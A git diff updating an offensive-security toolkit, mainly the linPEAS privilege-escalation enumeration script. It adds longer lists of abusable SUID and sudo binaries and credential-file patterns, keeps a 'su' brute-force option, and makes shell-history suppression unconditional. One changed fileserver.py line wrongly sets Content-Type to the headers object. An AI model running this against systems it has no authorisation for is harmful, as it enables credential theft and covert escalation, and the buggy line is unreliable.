diff --git a/chisel64 b/chisel64 index 452fe8b..f0cc154 100755 Binary files a/chisel64 and b/chisel64 differ diff --git a/deepce.sh b/deepce.sh index 0a4b0a0..efd7798 100755 --- a/deepce.sh +++ b/deepce.sh @@ -347,7 +347,7 @@ containerCheck() { # Are we inside kubenetes? if grep "/kubepod" /proc/1/cgroup -qa; then inContainer="1" - containerType="kubentes" + containerType="kubernetes" fi # Are we inside LXC? diff --git a/fileserver.py b/fileserver.py index 47dff3b..06c2415 100755 --- a/fileserver.py +++ b/fileserver.py @@ -86,6 +86,8 @@ class FileServerRequestHandler(BaseHTTPRequestHandler): if path in self.server.dumpRequests: headers["Access-Control-Allow-Origin"] = "*" + headers["Content-Length"] = len(data) + if len(headers) == 0: self.send_response(status_code) else: @@ -149,11 +151,14 @@ class HttpFileServer(HTTPServer): if isinstance(data, str): data = data.encode("UTF-8") - # return 200 - OK and data + headers = { + "Access-Control-Allow-Origin": "*", + } if mimeType: - self.addRoute(name, lambda req: (200, data, { "Content-Type": mimeType })) - else: - self.addRoute(name, lambda req: (200, data)) + headers["Content-Type"] = headers + + # return 200 - OK and data + self.addRoute(name, lambda req: (200, data, headers)) def dumpRequest(self, name): self.dumpRequests.append(self.cleanPath(name)) diff --git a/linpeas.sh b/linpeas.sh old mode 100755 new mode 100644 index b36ff0a..2888d38 --- a/linpeas.sh +++ b/linpeas.sh @@ -1,12 +1,12 @@ #!/bin/sh VERSION="ng" -ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission." +ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission." ########################################### #-------) Checks pre-everything (---------# ########################################### -if [ "$(/usr/bin/id -u)" -eq "0" ]; then +if ([ -f /usr/bin/id ] && [ "$(/usr/bin/id -u)" -eq "0" ]) || [ "`whoami 2>/dev/null`" = "root" ]; then IAMROOT="1" MAXPATH_FIND_W="3" else @@ -52,16 +52,16 @@ ITALIC="${C}[3m" if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi FAST="1" #By default stealth/fast mode SUPERFAST="" -NOTEXPORT="" DISCOVERY="" PORTS="" QUIET="" -CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" +CHECKS="system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files" WAIT="" PASSWORD="" NOCOLOR="" -VERBOSE="" +DEBUG="" AUTO_NETWORK_SCAN="" +EXTRA_CHECKS="" THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")" [ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 [ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2 @@ -70,28 +70,27 @@ HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. ${YELLOW}-h${BLUE} To show this message ${YELLOW}-q${BLUE} Do not show banner - ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-e${BLUE} Perform extra enumeration ${YELLOW}-s${BLUE} SuperFast (don't check some time consuming checks) - Stealth mode - ${YELLOW}-w${BLUE} Wait execution between big blocks - ${YELLOW}-n${BLUE} Do not export env variables related with history and do not check Internet connectivity + ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-w${BLUE} Wait execution between big blocks of checks ${YELLOW}-N${BLUE} Do not use colours - ${YELLOW}-v${BLUE} Verbose execution + ${YELLOW}-D${BLUE} Debug mode ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-o${BLUE} Only execute selected checks (system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files). Select a comma separated list. ${YELLOW}-L${BLUE} Force linpeas execution. ${YELLOW}-M${BLUE} Force macpeas execution. ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 ${YELLOW}-p -d ${BLUE} Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139 ${YELLOW}-i [-p ]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 ${YELLOW}-t${BLUE} Automatic network scan (host discovery and port scanning) - This option writes to files - $GREEN Notice${BLUE} that if you select some network action, no PE check will be performed$NC" + $GREEN Notice${BLUE} that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed$NC" -while getopts "h?asnd:p:i:P:qo:LMwNvt" opt; do +while getopts "h?asd:p:i:P:qo:LMwNDte" opt; do case "$opt" in h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; - a) FAST="";; + a) FAST="";EXTRA_CHECKS="1";; s) SUPERFAST=1;; - n) NOTEXPORT=1;; d) DISCOVERY=$OPTARG;; p) PORTS=$OPTARG;; i) IP=$OPTARG;; @@ -102,8 +101,9 @@ while getopts "h?asnd:p:i:P:qo:LMwNvt" opt; do M) MACPEAS="1";; w) WAIT=1;; N) NOCOLOR="1";; - v) VERBOSE="1";; + D) DEBUG="1";; t) AUTO_NETWORK_SCAN="1";; + e) EXTRA_CHECKS="1";; esac done @@ -213,17 +213,17 @@ print_banner(){ } -print_support (){ +print_support () { printf """ - ${GREEN}/---------------------------------------------------------------------------\\ - | ${BLUE}Do you like PEASS?${GREEN} | - |---------------------------------------------------------------------------| - | ${YELLOW}Become a Patreon${GREEN} : ${RED}https://www.patreon.com/peass${GREEN} | - | ${YELLOW}Follow on Twitter${GREEN} : ${RED}@carlospolopm${GREEN} | - | ${YELLOW}Respect on HTB${GREEN} : ${RED}SirBroccoli & makikvues${GREEN} | - |---------------------------------------------------------------------------| - | ${BLUE}Thank you! ${GREEN} | - \---------------------------------------------------------------------------/ + ${GREEN}/---------------------------------------------------------------------------\\ + | ${BLUE}Do you like PEASS?${GREEN} | + |---------------------------------------------------------------------------| + | ${YELLOW}Become a Patreon${GREEN} : ${RED}https://www.patreon.com/peass${GREEN} | + | ${YELLOW}Follow on Twitter${GREEN} : ${RED}@carlospolopm${GREEN} | + | ${YELLOW}Respect on HTB${GREEN} : ${RED}SirBroccoli ${GREEN} | + |---------------------------------------------------------------------------| + | ${BLUE}Thank you! ${GREEN} | + \---------------------------------------------------------------------------/ """ } @@ -233,7 +233,7 @@ print_support (){ echo "" if [ ! "$QUIET" ]; then print_banner; print_support; fi -printf ${BLUE}" $SCRIPTNAME-$VERSION ${YELLOW}by carlospolop\n"$NC; +printf ${BLUE}" $SCRIPTNAME-$VERSION ${YELLOW}by carlospolop\n"$NC; echo "" printf ${YELLOW}"ADVISORY: ${BLUE}$ADVISORY\n$NC" echo "" @@ -287,7 +287,10 @@ if [ $myuid -gt 2147483646 ]; then baduid="|$myuid"; fi idB="euid|egid$baduid" sudovB="[01].[012345678].[0-9]+|1.9.[01234]|1.9.5p1" -mounted=$( (mount -l || cat /proc/mounts || cat /proc/self/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}') +mounted=$( (cat /proc/self/mountinfo || cat /proc/1/mountinfo) 2>/dev/null | cut -d " " -f5 | grep "^/" | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}') +if ! [ "$mounted" ]; then + mounted=$( (mount -l || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}') +fi if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi #Don't let any blacklist to be empty mountG="swap|/cdrom|/floppy|/dev/shm" notmounted=$(cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|')"ImPoSSssSiBlEee" @@ -362,12 +365,12 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" #To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' -sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$' -sidVB2='/msguniq$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' +sidVB='/ab$|/agetty$|/ar$|/aria2c$|/arj$|/arp$|/as$|/ascii-xfr$|/ash$|/aspell$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/efax$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genisoimage$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/ispell$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/lftp$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$' +sidVB2='/msgmerge$|/msguniq$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nm$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/ptx$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/sash$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/sshpass$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' cfuncs='file|free|main|more|read|split|write' -sudoVB1=" \*|env_keep\+=LD_PRELOAD|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ash$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|git$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$|mount$" -sudoVB2="msgattrib$|msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|mtr$|mv$|mysql$|nano$|nasm$|nawk$|nc$|neofetch$|nice$|nl$|nmap$|node$|nohup$|npm$|nroff$|nsenter$|octave$|od$|openssl$|openvpn$|openvt$|paste$|pdb$|pdflatex$|pdftex$|perl$|pg$|php$|pic$|pico$|pip$|pkexec$|pkg$|pr$|pry$|psql$|puppet$|python$|rake$|readelf$|red$|redcarpet$|restic$|rev$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rview$|rvim$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|sg$|shuf$|slsh$|smbclient$|snap$|socat$|soelim$|sort$|split$|sqlite3$|ss$|ssh-keygen$|ssh-keyscan$|ssh$|start-stop-daemon$|stdbuf$|strace$|strings$|su$|sysctl$|systemctl$|systemd-resolve$|tac$|tail$|tar$|taskset$|tbl$|tclsh$|tcpdump$|tee$|telnet$|tex$|tftp$|tic$|time$|timedatectl$|timeout$|tmux$|top$|troff$|ul$|unexpand$|uniq$|unshare$|update-alternatives$|uudecode$|uuencode$|valgrind$|vi$|view$|vigr$|vim$|vimdiff$|vipw$|virsh$|watch$|wc$|wget$|whiptail$|wish$|xargs$|xelatex$|xetex$|xmodmap$|xmore$|xxd$|xz$|yarn$|yum$|zip$|zsh$|zsoelim$|zypper$" +sudoVB1=" \*|env_keep\+=LD_PRELOAD|ab$|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ascii-xfr$|ascii85$|ash$|aspell$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|efax$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|git$|grc$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|ispell$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|lftp$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$" +sudoVB2="mount$|msgattrib$|msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|mtr$|mv$|mysql$|nano$|nasm$|nawk$|nc$|neofetch$|nice$|nl$|nm$|nmap$|node$|nohup$|npm$|nroff$|nsenter$|octave$|od$|openssl$|openvpn$|openvt$|paste$|pdb$|pdflatex$|pdftex$|perf$|perl$|pg$|php$|pic$|pico$|pip$|pkexec$|pkg$|pr$|pry$|psql$|ptx$|puppet$|python$|rake$|readelf$|red$|redcarpet$|restic$|rev$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rview$|rvim$|sash$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|sg$|shuf$|slsh$|smbclient$|snap$|socat$|soelim$|sort$|split$|sqlite3$|ss$|ssh-keygen$|ssh-keyscan$|ssh$|sshpass$|start-stop-daemon$|stdbuf$|strace$|strings$|su$|sysctl$|systemctl$|systemd-resolve$|tac$|tail$|tar$|taskset$|tbl$|tclsh$|tcpdump$|tee$|telnet$|tex$|tftp$|tic$|time$|timedatectl$|timeout$|tmux$|top$|troff$|ul$|unexpand$|uniq$|unshare$|update-alternatives$|uudecode$|uuencode$|valgrind$|vi$|view$|vigr$|vim$|vimdiff$|vipw$|virsh$|wall$|watch$|wc$|wget$|whiptail$|wireshark$|wish$|xargs$|xelatex$|xetex$|xmodmap$|xmore$|xxd$|xz$|yarn$|yum$|zip$|zsh$|zsoelim$|zypper$" sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount" sudoG="NOEXEC" @@ -491,7 +494,7 @@ TIMEOUT="$(command -v timeout 2>/dev/null)" STRACE="$(command -v strace 2>/dev/null)" STRINGS="$(command -v strings 2>/dev/null)" -shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" +shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" notBackup="/tdbbackup$|/db_hotbackup$" @@ -508,7 +511,7 @@ profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh| knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" -timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-messaging.timer|ureadahead-stop.timer" +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" @@ -517,13 +520,13 @@ ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client6 dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism" -CONTAINER_CMDS="docker lxc rkt kubectl podman runc" +USEFUL_SOFTWARE="authbind aws base64 ctr curl doas docker fetch g++ gcc gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 rkt ruby runc socat sudo wget xterm" TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible." GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion" GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" -GREP_IGNORE_MOUNTS="/ /|/cgroup|/var/lib/docker/|/null | proc proc |/dev/console|docker.sock" +GREP_IGNORE_MOUNTS="/ /|/null | proc proc |/dev/console" -INT_HIDDEN_FILES="._history.|.bashrc|.bluemix|.cer|.cloudflared|.crt|.csr|.db|.der|.env|.erlang.cookie|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.ldaprc|.lesshst|.mozilla|.msmtprc|.ovpn|.p12|.pem|.pfx|.pgp|.plan|.profile|.pypirc|.rdg|.recently-used.xbel|.rhosts|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.timer|.vault-token|.viminfo|.vnc|.wgetrc" +INT_HIDDEN_FILES=".bashrc|.bluemix|.cer|.cloudflared|.crt|.csr|.db|.der|.env|.erlang.cookie|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.ldaprc|.lesshst|.mozilla|.msmtprc|.ovpn|.p12|.password-store|.pem|.pfx|.pgp|.plan|.profile|.psk|.pypirc|.rdg|.recently-used.xbel|.rhosts|.secrets.mkey|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.timer|.vault-token|.viminfo|.vnc|.wgetrc" ########################################### #---------) Checks before start (---------# @@ -582,7 +585,7 @@ echo_no (){ } print_title(){ - if [ "$VERBOSE" ]; then + if [ "$DEBUG" ]; then END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) @@ -599,11 +602,37 @@ print_title(){ START_T1_TIME=$(date +%s 2>/dev/null) fi - printf ${BLUE}"════════════════════════════════════╣ $GREEN$1${BLUE} ╠════════════════════════════════════\n"$NC + title=$1 + title_len=$(echo $title | wc -c) + max_title_len=100 + rest_len=$((($max_title_len - $title_len) / 2)) + + printf ${BLUE} + for i in $(seq 1 $rest_len); do printf " "; done + printf "╔" + for i in $(seq 1 $title_len); do printf "═"; done; printf "═"; + printf "╗" + + echo "" + + for i in $(seq 1 $rest_len); do printf "═"; done + printf "╣ $GREEN${title}${BLUE} ╠" + for i in $(seq 1 $rest_len); do printf "═"; done + + echo "" + + printf ${BLUE} + for i in $(seq 1 $rest_len); do printf " "; done + printf "╚" + for i in $(seq 1 $title_len); do printf "═"; done; printf "═"; + printf "╝" + + printf $NC + echo "" } print_2title(){ - if [ "$VERBOSE" ]; then + if [ "$DEBUG" ]; then END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) @@ -820,7 +849,7 @@ discovery_port_scan (){ basic_net_info #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389 - print_title "Network Discovery (scanning ports)" + print_title "Internal Network Discovery - Finding hosts and scanning ports" DISCOVERY=$1 MYPORTS=$2 @@ -862,14 +891,511 @@ discovery_port_scan (){ #---) Exporting history env variables (---# ########################################### -if ! [ "$NOTEXPORT" ]; then - unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH - export HISTFILE=/dev/null - export HISTSIZE=0 - export HISTFILESIZE=0 +unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH +export HISTFILE=/dev/null +export HISTSIZE=0 +export HISTFILESIZE=0 + + + +########################################### +#-----------) Some Basic Info (-----------# +########################################### + +print_title "Basic information" +printf $LG"OS: "$NC +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} 